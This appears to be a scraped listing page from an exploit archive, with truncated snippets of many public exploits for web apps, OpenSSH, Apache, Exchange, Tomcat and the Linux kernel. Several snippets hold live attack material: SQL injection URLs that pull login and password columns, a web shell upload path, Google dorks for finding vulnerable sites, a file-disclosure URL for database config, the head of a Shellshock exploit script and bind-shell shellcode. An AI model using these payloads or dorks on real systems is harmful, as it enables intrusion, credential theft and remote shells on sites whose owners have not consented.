StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 - Arbitrary File Reading

+-------------------------------------------------------------------------------+ + StatusNet/Laconica title = $this-trimmed'title'; $this-filename = INSTALLDIR.'/doc-src/'.$this-title; //1 if !fileexists$this-filename $this-clientError'No such document.'; return; $this-showPage;...

PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload

Powered by PHPizabi v0.848b C1 HFP1 remote file upload author: ZoRLu home: www.yildirimordulari.org contact: [email protected] dork: "Powered by PHPizabi v0.848b C1 HFP1" exploit: http://localhost/izabi/system/cache/pictures/idshell.php -first register web site -Create an event on the click an...

IndexScript 2.8 - 'cat_id' SQL Injection

Site: http://indexscript.com Found By: xssvgamer Google Dork: allintext: "This site is powered by IndexScript" exploit: http://www.example.com/showcat.php?catid=-1 UNION ALL SELECT login,password FROM dirlogin / Blind SQL injection in indexscript.. Vul Code: "$sql = "select name, metatitle,...

cpDynaLinks 1.02 - 'category.php' SQL Injection

!/usr/bin/perl cpDynaLinks 1.02 Remote Sql Inyection exploit download: http://www.cplinks.com/download/cpdynalinks/cpdynalinksversion102full.zip bug found by s0cratex exploit written by ka0x D.O.M TEAM 2007 d0rk: Powered by cpDynaLinks need magicquotesgpc off contact: ka0x@domlabs: perl...

easyLink 1.1.0 - 'detail.php' SQL Injection

================================================================================ easyLink V1.1.0 detail.php Remote SQL Injection Vulnerability ================================================================================ Discovered By: Egypt Coder home : WWW.Sec-Area.com Mail:...

Site Sift Listings - 'id' SQL Injection

powered by Site Sift scripts SQL Injection AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : powered by Site Sift DORK 2 : allinurl: "index php go addpage" DORK 2 : allinurl: "index.php?go=deta...

DZCP (deV!L`z Clanportal) 1.5.2 - Remote File Inclusion

deV!Lz Clanportal 1.5.2 Remote File Include Vulnerability + Discovered By: cr4wl3r + Download: http://www.dzcp.de/downloads/?action=download&id=131 x Code in dzcp1.5.2/inc/config.php REQUIRES requireonce$basePath."/inc/mysql.php"; $code $tpl = strreplace''.$value.'', $code, $tpl; return $tpl; +...

OpenSSH SCP Client - Write Arbitrary Files

''' Title: SSHtranger Things Author: Mark E. Haase Homepage: https://www.hyperiongray.com Date: 2019-01-17 CVE: CVE-2019-6111, CVE-2019-6110 Advisory: https://sintonen.fi/advisories/scp-client-multiple-vulnerabilities.txt Tested on: Ubuntu 18.04.1 LTS, OpenSSH client 7.6p1 We have nicknamed this...

Apache 2.4.x - Buffer Overflow

Exploit Title: Apache 2.4.x - Buffer Overflow Date: Jan 2 2023 Exploit Author: Sunil Iyengar Vendor Homepage: https://httpd.apache.org/ Software Link: https://archive.apache.org/dist/httpd/ Version: Any version less than 2.4.51. Tested on 2.4.50 and 2.4.51 Tested on: Server Kali, Client MacOS...

WeBid 1.0.6 - Multiple Vulnerabilities

Title: Webid Blind SQL Injection / Local File Disclosure Vulnerability Google Dork: intext:"Powered by WeBid" Author: Ahmed Aboul-Ela Contact: Ahmed.Aboul3laatgmaildotcom Vendor: http://www.webidsupport.com/ Software Link:...

Glype 1.4.9 - Local Address Filter Bypass

------------------------------------------------------------------------ Glype proxy local address filter bypass ------------------------------------------------------------------------ Securify, September 2014 ------------------------------------------------------------------------ Abstract...

Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection

!/bin/python Exploit Title: Shellshock SMTP Exploit Date: 10/3/2014 Exploit Author: fattymcwopr Vendor Homepage: gnu.org Software Link: http://ftp.gnu.org/gnu/bash/ Version: 4.2.x " argc = lensys.argv ifargc 3: usage sys.exit0 rport = 25 rhost = sys.argv1 cmd = sys.argv2 headers = "To",...

WikkaWiki 1.3.2 - Multiple Vulnerabilities

---------------------------------------------------- WikkaWiki Query" 142. UPDATE ".$this-GetConfigValue'tableprefix'."users 143. SET email = '".mysqlrealescapestring$email."', 144. doubleclickedit = '".mysqlrealescapestring$doubleclickedit."', 145. showcomments =...

Pligg CMS 9.9.0 - 'story.php' SQL Injection

|| | | Pligg Beta 9.9.0 id Remote SQL Injection Vulnerability | | |---------------------Hussin X----------------------| | | Author: Hussin X | | Home : www.tryag.cc/cc | | email: darkangelg85atYahooDoTcom | | | | | | | | script : http://www.pligg.com/ | | DorK : Powered By Pligg | Legal: License...

Alex Guestbook - Multiple Vulnerabilities

============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | // \ || || // \ || || ============================================================================== » Note : Forever RevengeHack.Com-Ar-Ge.Org Acildi...

WikkaWiki 1.3.2 - Spam Logging PHP Injection (Metasploit)

This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework/ require 'msf/core' class Metasploit3 "WikkaWiki 1.3.2...

Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Remote Buffer Overflow

// source: https://www.securityfocus.com/bid/3064/info A boundary condition error exists in telnet daemons derived from the BSD telnet daemon. Under certain circumstances, the buffer overflow can occur when a combination of telnet protocol options are received by the daemon. The function...

OpenSSH 7.2 - Denial of Service

Title : OpenSSH before 7.3 Crypt CPU Consumption DoS Vulnerability Author : Kashinath T [email protected] www.secpod.com Vendor : http://www.openssh.com/ Software : http://www.openssh.com/ Version : OpenSSH before 7.3 Tested on : Ubuntu 16.04 LTS, Centos 7 CVE : CVE-2016-6515 Date : 20-10-201...

asgbookPHP 1.9 - 'index.php' Cross-Site Scripting

source: https://www.securityfocus.com/bid/50167/info asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the...

HyperBook Guestbook 1.3 - GBConfiguration.DAT Hashed Password Information Disclosure

source: https://www.securityfocus.com/bid/22754/info HyperBook Guestbook is prone to an information-disclosure vulnerability because the application fails to protect sensitive information. An attacker can exploit this issue to access sensitive information that may lead to other attacks. This issu...

DZCP (deV!L`z Clanportal) 1.5.3 - Multiple Vulnerabilities

======================================================================================== | Title : deV!Lz Clanportal V1.5 Mullti Vulnerability | Author : indoushka | email : [email protected] | Home : www.iqs3cur1ty.com/vb | Script : CMS © 2005 - 2010 by deV!Lz Clanportal - supported by...

PHP weby directory software 1.2 - Multiple Vulnerabilities

=========================================== Vulnerable Software: PHP Weby directory software version 1.2 Vendor: http://phpweby.com Download: htp://phpweby.com/down/phpwebydirectory.zip Vuln: Blind SQL injection && CSRF Dork: intext:Powered by PHP weby software...

phpDolphin 2.0.5 - Multiple Vulnerabilities

Exploit Title: phpDolphin http://target.com/index.php?a=search&q=teste&filter=m"XSS CSRF ==== We've found no protection against CSRF Cross-site Request Forgery, which made possible to do any kind of act on a user or admin account. NO FORMS are secured at all. But we've included some interesting...

Advanced Comment System 1.0 - Multiple Remote File Inclusions

====================================================== Advanced comment system1.0 Remote File Inclusion Vulnerability Found by : kurdish hackers team C0ntact : pshela at YaHoo .com Groups : Kurd-Team site : www.kurdteam.org ======================================================= +++++++++++++++++...

SCP Client - Multiple Vulnerabilities (SSHtranger Things)

Exploit Title: SSHtranger Things Date: 2019-01-17 Exploit Author: Mark E. Haase Vendor Homepage: https://www.openssh.com/ Software Link: download link if available Version: OpenSSH 7.6p1 Tested on: Ubuntu 18.04.1 LTS CVE : CVE-2019-6111, CVE-2019-6110 ''' Title: SSHtranger Things Author: Mark E...

jQuery 1.2 - Cross-Site Scripting (XSS)

Exploit Title: jQuery 1.2 - Cross-Site Scripting XSS Date: 04/29/2020 Exploit Author: Central InfoSec Version: jQuery versions greater than or equal to 1.2 and before 3.5.0 CVE : CVE-2020-11022 Proof of Concept 1:...

PHPizabi 0.848b C1 HFP3 - Database Information Disclosure

-------------------------------------------------------- PHPizabi v0.848b C1 HFP3 database information exposure -------------------------------------------------------- I would like to state that I am in no way responsible for how this information is used. It is just that, information and is...

OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH

!/bin/python This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or at your option any later version. This program is distributed in the hope that i...

OpenSSH 2.3 < 7.7 - Username Enumeration

Exploit: OpenSSH 7.7 - Username Enumeration Author: Justin Gardner Date: 2018-08-20 Software: https://ftp4.usa.openbsd.org/pub/OpenBSD/OpenSSH/openssh-7.7.tar.gz Affected Versions: OpenSSH version 7.7 CVE: CVE-2018-15473 / \ / / | | | | | | | | | | | || | | | | | ' \ / \ ' \ \ \ | | | || | | | /...

OpenSSH < 7.7 - User Enumeration (2)

!/usr/bin/env python2 CVE-2018-15473 SSH User Enumeration by Leap Security @LeapSecurity https://leapsecurity.io Credits: Matthew Daley, Justin Gardner, Lee David Painter import argparse, logging, paramiko, socket, sys, os class InvalidUsernameException: pass malicious function to malform packet...

jQuery 1.0.3 - Cross-Site Scripting (XSS)

Exploit Title: jQuery 1.0.3 - Cross-Site Scripting XSS Date: 04/29/2020 Exploit Author: Central InfoSec Version: jQuery versions greater than or equal to 1.0.3 and before 3.5.0 CVE : CVE-2020-11023 Proof of Concept 1: Proof of Concept 2 Only jQuery 3.x affected: "...

MediaXxx Adult Video / Media Script - SQL Injection

Exploit Title: MediaXxx Adult Video / Media Script SQL Injection Date: 19/05/2012 Author: Daniel Godoy Author Mail: DanielGodoyatGobiernoFederaldotcom Author Web: www.delincuentedigital.com.ar Software: MediaXxx http://www.mediaxxxscript.com/ Tested on: Linux Dork: "Powered by MediaXxx Mobile"...

Tomcat - Remote Code Execution via JSP Upload Bypass (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Tomcat RCE via JSP Upload Bypass', 'Description' = %q This module uploads a jsp payload and executes it. , 'Author' = 'peewpw', 'License' =...

BoastMachine 3.1 - 'mail.php' id SQL Injection

...:::::boastMachine =3.1 SQL Injection Vulnerbility ::::.... Virangar Security Team www.virangar.org www.virangar.net -------- Discoverd By :virangar security teamhadihadi special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the...

Linux/x64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (1234567) Shellcode (136 bytes)

Linux/x64 - Bind TCP 4444/TCP Shell /bin/sh + Password 1234567 Shellcode 136 bytes. Shellcode exploit for Linuxx86-64 platform global start start: ; sock = socketAFINET, SOCKSTREAM, 0 ; AFINET = 2 ; SOCKSTREAM = 1 ; syscall number 41 push 41 pop rax push 2 pop rdi push 1 pop rsi cdq syscall ; cop...

Tiki Wiki CMS Groupware 21.1 - Authentication Bypass

Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass Date: 01.08.2020 1st August 2020 Exploit Author: Maximilian Barz aka. Silky Vendor Homepage: tiki.org Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki21.xUYScuti/21.1/tiki-21.1.zip Version: 21.1 Tested on:...

snetworks PHP Classifieds 5.0 - Remote File Inclusion

+By CrackersChild+ Script.......: SNETWORKS PHP CLASSIFIEDS Page.........: http://www.snetworks.biz/ Author.......: CrackersChild | [email protected] & [email protected] Class........: Remote File Ä°nclude Vulnerability Demo.........: http://xxxclassifieds.com/classifieds/...

CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload

CMSimple 3.1 Local File Inclusion / Arbitrary File Upload download: http://www.cmsimple.org/?Downloads dork: "Powered by CMSimple" author: [email protected] homepage: http://irk4z.wordpress.com Local File Inclusion : http://host/path/index.php?sl=file%00...

Maian Guestbook 3.2 - Insecure Cookie Handling

-+================================================================================+- -+ Maian Guestbook = 3.2 Insecure Cookie Handling Vulnerability +- -+================================================================================+- Discovered By: S.W.A.T. E-Mail: svvateamatyahoodotcom Script...

DZCP (deV!L`z Clanportal) 1.4.9.6 - Blind SQL Injection

use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent-new cookiejar = HTTP::Cookies-new,; $ua-agent 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' ; usage; print "\n"; $server = $ARGV0; $dir = $ARGV1; $username = $ARGV2; $password = $ARGV3; if !$password die "Argh! Read teh Usage!\n"; $url...

Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege Escalation

?php CARPE DIEM: CVE-2019-0211 Apache Root Privilege Escalation Charles Fol @cfreal 2019-04-08 INFOS https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html USAGE 1. Upload exploit to Apache HTTP server 2. Send request to page 3. Await 6:25AM for logrotate to restart Apache 4...

DZCP (deV!L`z Clanportal) 1.34 - 'id' SQL Injection

? errorreportingEERROR; function exploitinit if !extensionloaded'phpcurl' && !extensionloaded'curl' if !dl'curl.so' && !dl'phpcurl.dll' die "oo error - cannot load curl extension!"; function exploitheader echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo";...

SIPS 0.2.2 - User Information Disclosure

source: https://www.securityfocus.com/bid/7134/info It has been reported that authentication is not required to view user account information. As a result, an unauthorized remote attacker may be able to view potentially sensitive information. This may aid in launching further attacks against a...

Esotalk CMS 1.0.0g4 - Cross-Site Scripting

/ Exploit Title: esotalk cms topics xss vulnerability Google Dork: powered by esotalk Date: 2014-11-01 Vul Author: Evi1m0ff0000team Vul Advisory: http://www.hackersoul.com/post/ff0000-hsdb-0006.html Vendor Homepage: http://esotalk.org/ Software Link: http://esotalk.org/download Tested on: Linux /...

DZCP (deV!L`z Clanportal) 1.4.5 - Remote File Disclosure

DZCP Devilz Clanportal = 1.4.5 Mysql Data viewable Found by: Kiba Solution: Install security Fix! Exploit: http://SITE/PATH/inc/filebrowser/browser.php?file=inc/mysql.php Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php milw0rm.com 2007-02-21...

Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation

/ EDB-Note: Systems with less than 32GB of RAM are unlikely to be affected by this issue, due to memory demands during exploitation. EDB Note: poc-exploit.c / / poc-exploit.c for CVE-2018-14634 Copyright C 2018 Qualys, Inc. This program is free software: you can redistribute it and/or modify it...

Microsoft Exchange 2019 - Server-Side Request Forgery (Proxylogon) (PoC)

Exploit Title: Microsoft Exchange 2019 - SSRF to Arbitrary File Write Proxylogon Date: 2021-03-10 Exploit Author: testanull Vendor Homepage: https://www.microsoft.com Version: MS Exchange Server 2013, 2016, 2019 CVE: 2021-26855, 2021-27065 import requests from urllib3.exceptions import...

Linux Kernel 4.3.3 (Ubuntu 14.04/15.10) - 'overlayfs' Local Privilege Escalation (1)

/ just another overlayfs exploit, works on kernels before 2015-12-26 Exploit Title: overlayfs local root Date: 2016-01-05 Exploit Author: rebel Version: Ubuntu 14.04 LTS, 15.10 and more Tested on: Ubuntu 14.04 LTS, 15.10 CVE : CVE-2015-8660 blah@ubuntu:$ id uid=1001blah gid=1001blah groups=1001bl...

BoastMachine 3.1 - Cross-Site Request Forgery (Add Admin)

Exploit Title: boastMachine v3.1 document.nano.submit; Greetz : Dr.WEP , JIKO , All FriendS...

PHPizabi 0.848b C1 HFP1-3 - Remote Command Execution

!/usr/bin/php ?php / Found this after getting my inet back and noticing this http://www.milw0rm.com/exploits/6085 . The only problem with the remote command execution there is that it actually requires registerglobals = on. I saw the GLOBAL keyword, and actually believed this populated those...